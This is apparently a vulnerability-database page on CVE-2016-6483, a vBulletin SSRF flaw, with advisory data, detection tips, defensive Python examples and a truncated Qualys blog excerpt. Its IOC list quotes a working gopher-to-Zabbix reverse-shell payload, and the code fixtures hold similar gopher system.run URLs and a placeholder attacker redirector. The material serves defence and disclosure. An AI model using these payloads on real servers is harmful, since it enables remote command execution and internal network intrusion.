CVE-2016-6483
Published 2016-09-02
Priority: P2 (63)
CVSS 3.0: 8.6 High, vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
Exploit: available
EPSS: 11.95% (95.6th percentile)
The media-file upload feature in vBulletin before 3.8.7 Patch Level 6, 3.8.8 before Patch Level 2, 3.8.9 before Patch Level 1, 4.x before 4.2.2 Patch Level 6, 4.2.3 before Patch Level 2, 5.x before 5.2.0 Patch Level 3, 5.2.1 before Patch Level 1, and 5.2.2 before Patch Level 1 allows remote attackers to conduct SSRF attacks via a crafted URL that results in a Redirection HTTP status code.
Affected
9 ranges (the eight patch-level ranges are the ones given in the description above)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vbulletin | vbulletin | <= 5.2.6 | — |
| vbulletin | vbulletin | before 3.8.7 Patch Level 6 | 3.8.7 PL6 |
| vbulletin | vbulletin | 3.8.8 before Patch Level 2 | 3.8.8 PL2 |
| vbulletin | vbulletin | 3.8.9 before Patch Level 1 | 3.8.9 PL1 |
| vbulletin | vbulletin | 4.x before 4.2.2 Patch Level 6 | 4.2.2 PL6 |
| vbulletin | vbulletin | 4.2.3 before Patch Level 2 | 4.2.3 PL2 |
| vbulletin | vbulletin | 5.x before 5.2.0 Patch Level 3 | 5.2.0 PL3 |
| vbulletin | vbulletin | 5.2.1 before Patch Level 1 | 5.2.1 PL1 |
| vbulletin | vbulletin | 5.2.2 before Patch Level 1 | 5.2.2 PL1 |
Detection & IOCs (extracted from sources)
- command: gopher://localhost:10050/1system.run[(/bin/bash -c 'nohup bash -i >/dev/tcp/<our_ext_ip>/<shell_port> 0<&1 2>&1 &') ; sleep 2s]
- Monitor POST requests to the vBulletin endpoint /link/getlinkdata whose 'url' parameter points to an external or internal IP/host; this parameter is the SSRF vector.
- Detect SSRF exploitation attempts in which the server follows an HTTP 301 redirect to an internal gopher:// or telnet:// URI targeting a localhost service (e.g., Zabbix Agent on port 10050).
- Alert on outbound connections initiated by the vBulletin server to attacker-controlled hosts on port 8080 (the default reverse-shell callback port used by the PoC exploit).
- The exploit requires the attacker's HTTP redirector to be reachable on port 80 or 443; detect the vBulletin server making outbound HTTP/HTTPS requests to external IPs as part of media-file URL fetching.
- A POST request to /link/getlinkdata with no or an empty 'url' parameter returns the string 'invalid_url'; use this as a fingerprinting check for vulnerable vBulletin instances.
- Note: the exploit's HTTP redirector must listen on port 80 or 443 to be accepted by vBulletin's media-upload URL validation; other ports are rejected.
- Note: the default port-scan range in the PoC is 20–90; attackers may extend it to 65535 for a full internal port scan.
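The monitoring points above can be turned into one request-side check. The following is an added example written for this page, not code from any of the cited sources or from vBulletin: it classifies POST requests to /link/getlinkdata by what the supplied 'url' would make the forum fetch (empty probe, non-http scheme, loopback or internal address, external host). The pipe-separated record layout and the log lines are constructed for the example; adapt parse_line() to whatever WAF or reverse-proxy logging captures the POST body.

```python
"""Added detection example for CVE-2016-6483 (not from the page's sources or
from vBulletin): flag POST requests to /link/getlinkdata whose 'url' parameter
makes the forum fetch an attacker-chosen target. The record layout and the log
lines are constructed for this example."""
import ipaddress
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/link/getlinkdata"
FETCH_SCHEMES = {"http", "https"}   # the only schemes a media fetch should start with


def host_class(host):
    """Classify a URL host as 'loopback', 'internal', 'public', 'hostname' or 'missing'."""
    if not host:
        return "missing"
    host = host.lower()
    if host == "localhost":
        return "loopback"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"   # needs DNS to classify; not done offline
    if ip.is_loopback:
        return "loopback"
    # ipaddress also treats the RFC 5737 documentation ranges as non-global
    if ip.is_private or ip.is_link_local or not ip.is_global:
        return "internal"
    return "public"


def parse_line(line):
    """Constructed record format: ts|client_ip|method|path|body (body may contain '|')."""
    ts, client, method, path, body = line.rstrip("\n").split("|", 4)
    return {"ts": ts, "client": client, "method": method, "path": path, "body": body}


def analyse(rec):
    """Return (severity, reason) for a request record, or None if it is not of interest."""
    if rec["method"] != "POST" or rec["path"].split("?", 1)[0] != ENDPOINT:
        return None
    url = parse_qs(rec["body"], keep_blank_values=True).get("url", [""])[0]
    if not url:
        # vBulletin answers 'invalid_url' here; the PoC uses that as its fingerprint
        return ("low", "getlinkdata probe with empty url (fingerprinting)")
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in FETCH_SCHEMES:
        return ("high", f"non-http scheme {scheme!r} supplied directly")
    cls = host_class(parts.hostname)
    if cls in ("loopback", "internal"):
        return ("high", f"url targets {cls} address {parts.hostname}")
    if parts.port not in (None, 80, 443):
        # vBulletin rejects these ports, but the attempt is still worth recording
        return ("medium", f"url uses non-standard port {parts.port}")
    return ("medium", f"server-side fetch of external {cls} {parts.hostname}")


def scan(lines):
    """Run analyse() over log lines; return a list of (ts, client, severity, reason)."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        verdict = analyse(rec)
        if verdict:
            hits.append((rec["ts"], rec["client"], *verdict))
    return hits


# Constructed sample log (hostnames and client addresses are placeholders).
SAMPLE_LOG = """\
2016-08-11T10:00:01Z|198.51.100.7|POST|/link/getlinkdata|url=
2016-08-11T10:00:02Z|198.51.100.7|POST|/link/getlinkdata|url=http://redir.attacker.example/
2016-08-11T10:00:03Z|198.51.100.7|POST|/link/getlinkdata|url=gopher://localhost:10050/1system.run%5Bid%5D
2016-08-11T10:00:04Z|198.51.100.7|POST|/link/getlinkdata|url=http://127.0.0.1:10050/
2016-08-11T10:00:05Z|192.0.2.44|GET|/forum/|-
2016-08-11T10:00:06Z|192.0.2.44|POST|/link/getlinkdata|url=https://video.example/watch?v=abc
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(*hit)
```

The direct gopher:// case is included because a first-hop non-http URL is rejected by vBulletin's own validation and therefore reveals an attacker probing the endpoint; the realistic exploitation path is the medium-severity external-host fetch, which only becomes conclusive when correlated with the outbound-connection alerts listed above.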
CVSS provenance
- NVD, CVSS v3.0: 8.6 HIGH, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
- NVD, CVSS v2.0: 5.0 MEDIUM, AV:N/AC:L/Au:N/C:N/I:P/A:N
GHSA
GHSA-54rx-pqvg-4w6x (unreviewed, 2022-05-17) · CVE-2016-6483 · HIGH · CWE-918
The media-file upload feature in vBulletin before 3.8.7 Patch Level 6, 3.8.8 before Patch Level 2, 3.8.9 before Patch Level 1, 4.x before 4.2.2 Patch Level 6, 4.2.3 before Patch Level 2, 5.x before 5.2.0 Patch Level 3, 5.2.1 before Patch Level 1, and 5.2.2 before Patch Level 1 allows remote attackers to conduct SSRF attacks via a crafted URL that results in a Redirection HTTP status code.
GHSA
GHSA-xc4w-h9rq-68jx (unreviewed, 2022-05-17, CVSS 8.6) · CVE-2017-7569 · HIGH · CWE-918
In vBulletin before 5.3.0, remote attackers can bypass the CVE-2016-6483 patch and conduct SSRF attacks by leveraging the behavior of the PHP parse_url function, aka VBV-17037.
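The two advisories together show what a server-side URL fetch has to get right: the redirect target must be validated as strictly as the first URL, and the validation must use the same host the connection actually goes to, so that a parser disagreement (the parse_url behaviour behind the patch bypass) cannot separate the checked host from the fetched one. The following is an added illustration written for this page, not vBulletin's code or its fix: redirects are followed manually, every hop is re-parsed, resolved and checked, and the request is pinned to the vetted address. The transport and resolver are injected and the hostnames, addresses and responses are constructed so the example runs offline.

```python
"""Added illustration (not vBulletin code) of a redirect-safe fetch for a
'fetch metadata from a user-supplied URL' feature. Every hop, including the
initial URL, goes through the same strict check, the host is resolved and the
connection is pinned to the vetted address, so a 301 to gopher://localhost or
to an internal IP is refused instead of followed. Transport and resolver are
injected; the fixtures below are constructed, not real services."""
import ipaddress
from urllib.parse import urlsplit, urljoin

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}
MAX_HOPS = 3
REDIRECTS = {301, 302, 303, 307, 308}


class UnsafeURL(ValueError):
    """Raised when a URL (or a redirect target) fails validation."""


def validate_target(url, resolve):
    """Strictly parse `url`, resolve its host and return the vetted IP string.

    Rejects non-http(s) schemes, embedded credentials, non-standard ports and
    any host that resolves to a non-global address (loopback, RFC 1918,
    link-local, etc.). `resolve(host)` must return a list of IP strings.
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme {parts.scheme!r} is not allowed")
    if parts.username is not None or parts.password is not None:
        # 'http://evil@127.0.0.1/' style authorities are where parsers disagree
        raise UnsafeURL("credentials in URL are not allowed")
    host = parts.hostname
    if not host:
        raise UnsafeURL("URL has no host")
    port = parts.port or (443 if scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        raise UnsafeURL(f"port {port} is not allowed")
    try:
        addrs = [str(ipaddress.ip_address(host))]   # IP literal: no DNS needed
    except ValueError:
        addrs = list(resolve(host))
    if not addrs:
        raise UnsafeURL(f"{host!r} does not resolve")
    for addr in addrs:
        if not ipaddress.ip_address(addr).is_global:
            raise UnsafeURL(f"{host!r} resolves to non-global address {addr}")
    return addrs[0]


def safe_fetch(url, transport, resolve, max_hops=MAX_HOPS):
    """Fetch `url`, following at most `max_hops` redirects by hand.

    `transport(url, addr)` performs one request, connecting to the vetted
    address `addr` with automatic redirects disabled, and returns
    (status, headers, body). Returns (final_url, body); raises UnsafeURL
    if any hop fails validation.
    """
    for _ in range(max_hops + 1):
        addr = validate_target(url, resolve)
        status, headers, body = transport(url, addr)
        if status in REDIRECTS:
            location = headers.get("Location")
            if not location:
                raise UnsafeURL("redirect without Location header")
            url = urljoin(url, location)   # re-validated on the next pass
            continue
        return url, body
    raise UnsafeURL("too many redirects")


# Constructed offline stand-ins for DNS and HTTP (hypothetical names/addresses).
FAKE_DNS = {
    "media.example": ["1.2.3.4"],        # placeholder globally-routable address
    "cdn.example": ["1.2.3.4"],
    "redir.attacker.example": ["1.2.3.4"],
    "localhost": ["127.0.0.1"],
}
FAKE_HTTP = {
    "http://cdn.example/old": (302, {"Location": "http://media.example/clip.mp4"}, b""),
    "http://media.example/clip.mp4": (200, {}, b"<video>"),
    # the CVE-2016-6483 pattern: a public redirector answering 301 to an internal gopher:// target
    "http://redir.attacker.example/": (301, {"Location": "gopher://localhost:10050/1system.run[id]"}, b""),
}


def fake_resolve(host):
    return FAKE_DNS.get(host, [])


def fake_transport(url, addr):
    return FAKE_HTTP[url]


def demo(url):
    """Return 'ok:<final_url>' or 'blocked:<reason>' against the constructed fixtures."""
    try:
        final_url, _ = safe_fetch(url, fake_transport, fake_resolve)
        return "ok:" + final_url
    except UnsafeURL as exc:
        return "blocked:" + str(exc)


if __name__ == "__main__":
    for u in ("http://cdn.example/old", "http://redir.attacker.example/",
              "http://127.0.0.1:10050/", "http://localhost/", "http://user@media.example/"):
        print(u, "->", demo(u))
```

Pinning the connection to the address returned by validate_target is what closes the parser-disagreement class of bypass: the HTTP client is never handed a host string to re-interpret, only an address that has already been checked. A production version would additionally re-check the address on every hop against DNS rebinding and cap response size and time.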
No detection rules found.
Qualys blog, 2017-01-10
Hackers Are Having a Field Day with Stolen Credentials
Login credentials have always been a weak link in cybersecurity’s protection chain, a situation that’s worsening. However, this trend could be reversed with a bit of effort from end users, website owners and software vendors.
## 2016: The Year of Stolen Credentials
Hackers made hay of the sorry state of credential security in 2016. They stole millions of username and password combinations from online services of all shapes and sizes. Blogs and discussion forums were hit particularly hard.
Exploiting credentials is an old attack vector that still works wonders for hackers. In its 2016 Data Breach Investigations Report (DBIR), Verizon added a section about credentials, revealing that 63% of data breaches involved weak, default or stolen passwords.
“This statistic drives our recommendatio
References
- http://legalhackers.com/advisories/vBulletin-SSRF-Vulnerability-Exploit.txt
- http://www.securityfocus.com/bid/92350
- http://www.securitytracker.com/id/1036553
- http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349548-security-patch-vbulletin-3-8-7-3-8-8-3-8-9-3-8-10-beta
- http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349549-security-patch-vbulletin-4-2-2-4-2-3-4-2-4-beta
- http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349551-security-patch-vbulletin-5-2-0-5-2-1-5-2-2
- https://www.exploit-db.com/exploits/40225/